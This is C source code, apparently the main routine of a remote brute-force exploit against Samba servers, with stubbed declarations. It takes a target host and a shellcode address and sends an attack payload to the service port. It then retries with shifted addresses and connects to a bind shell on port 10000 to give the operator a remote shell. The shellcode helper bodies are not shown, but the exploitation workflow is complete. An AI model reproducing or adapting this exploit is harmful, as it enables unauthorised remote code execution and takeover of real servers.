
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int u_long ;
typedef int tg_host ;
struct TYPE_2__ {int shell; char* ost; } ;


 int ATK_PORT ;
 int BRUTE_AT ;
 int SH_PORT ;
 int __atk_code_send_recv (int,int) ;
 int atoi (char*) ;
 int banrl () ;
 int close (int) ;
 int exit (int) ;
 int fflush (int ) ;
 int fprintf (int ,char*,...) ;
 int getopt (int,char**,char*) ;
 int memset (char*,int ,int) ;
 TYPE_1__* plat ;
 scalar_t__ re_connt (int,int) ;
 int send_recv_sh (int) ;
 scalar_t__ setsock (char*,int) ;
 int sleep (int) ;
 int stderr ;
 int stdout ;
 int strncpy (char*,char*,int) ;
 int strtoul (char*,int ,int ) ;
 int usage (char*) ;

int main(int argc,char *argv[])
{
 int sock,whtl,type=0,brute_f=0;
 char tg_host[0x82]="localhost";
 u_long shell=plat[type].shell;

 (void)banrl();
 if(argc<2)
 {
  (void)usage(argv[0]);
 }

 while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
 {
  extern char *optarg;
  switch(whtl)
  {
   case 'H':
   case 'h':
    memset((char *)tg_host,0,sizeof(tg_host));
    strncpy(tg_host,optarg,sizeof(tg_host)-1);
    break;

   case 'S':
   case 's':
    shell=strtoul(optarg,0,0);
    break;

   case 'T':
   case 't':
    if((type=atoi(optarg))>1)
    {
     (void)usage(argv[0]);
    }
    else shell=plat[type].shell;
    break;

   case 'I':
   case 'i':
    (void)usage(argv[0]);
    break;

   case 'B':
   case 'b':
    brute_f++;
    break;

   case '?':
    fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
    exit(-1);
    break;
  }
 }
 if(brute_f)
 {
  fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
  fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
  fprintf(stdout," [*] Brute-Force mode:\n\n");
  fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
  fprintf(stdout,"\n |");

  for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
  {
   fflush(stdout);
   fprintf(stdout,"=");

   shell+=(0x100);
   sock=(int)setsock(tg_host,ATK_PORT);

   if((int)re_connt(sock,0)==-1)
   {
    while(!(brute_f>=BRUTE_AT-1))
    {
     fprintf(stdout,"=");
     brute_f++;
    }
    fprintf(stdout,"|\n\n");
    fprintf(stderr," [-] Connect Failed.\n\n");
    exit(-1);
   }

   __atk_code_send_recv(sock,shell);
   close(sock);
   sleep(2);
   sock=(int)setsock(tg_host,SH_PORT);

   if((int)re_connt(sock,0)==-1)
   {
    continue;
   }

   while(!(brute_f>=BRUTE_AT-1))
   {
    fprintf(stdout,"=");
    brute_f++;
   }

   fprintf(stdout,"|\n\n");
   fprintf(stdout," [+] Shellcode address: %p\n",shell);
   fprintf(stdout," [*] Brute-Force end !!\n\n");
   fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
   fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");

   (void)send_recv_sh(sock);
  }

  fprintf(stdout,"|\n\n **\n");
  fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
  fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
  fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
  fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
  exit(-1);
 }
 else
 {
  fprintf(stdout," [0] Target: %s\n",plat[type].ost);
  fprintf(stdout," [1] Set socket.\n");
  sock=(int)setsock(tg_host,ATK_PORT);
  (int)re_connt(sock,1);

  fprintf(stdout," [2] Make shellcode & Send Packet.\n");
  __atk_code_send_recv(sock,shell);
  close(sock);

  fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
  sleep(2);

  sock=(int)setsock(tg_host,SH_PORT);
  (int)re_connt(sock,1);

  fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
  (void)send_recv_sh(sock);
 }
}
